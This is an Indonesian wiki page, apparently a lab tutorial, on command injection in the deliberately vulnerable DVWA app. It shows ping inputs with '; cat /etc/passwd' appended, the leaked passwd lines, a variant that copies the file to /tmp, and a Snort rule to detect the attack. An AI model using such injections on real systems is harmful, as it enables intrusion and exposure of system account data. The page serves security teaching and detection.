Difference between revisions of "DVWA: Command Injection"

• Login ke DVWA
• Klik Command Injection
• Ping isi IP yang bisa di ping misalnya, router anda, misalnya

192.168.0.223

• Hasilnya kira-kira

PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data.
64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms
64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms
64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms
64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms

--- 192.168.0.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms

• Tambahkan perintah cat sesudah nomor IP, misalnya

192.168.0.223; cat /etc/passwd

PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data.
64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms
64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms
64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms
64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms

--- 192.168.0.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
..
..
dst

• Lihat source DVWA mengapa melakukan hal itu

cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php

• Kalau iseng, coba copy password ke tmp, inject command

192.168.1.106; cat /etc/passwd | tee /tmp/passwd

Snort Rule

Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules

alert tcp any any -> 192.168.0.100 80 (content: "cat /etc/passwd"; msg: "WARNING: mencuri password!"; sid:1000002;)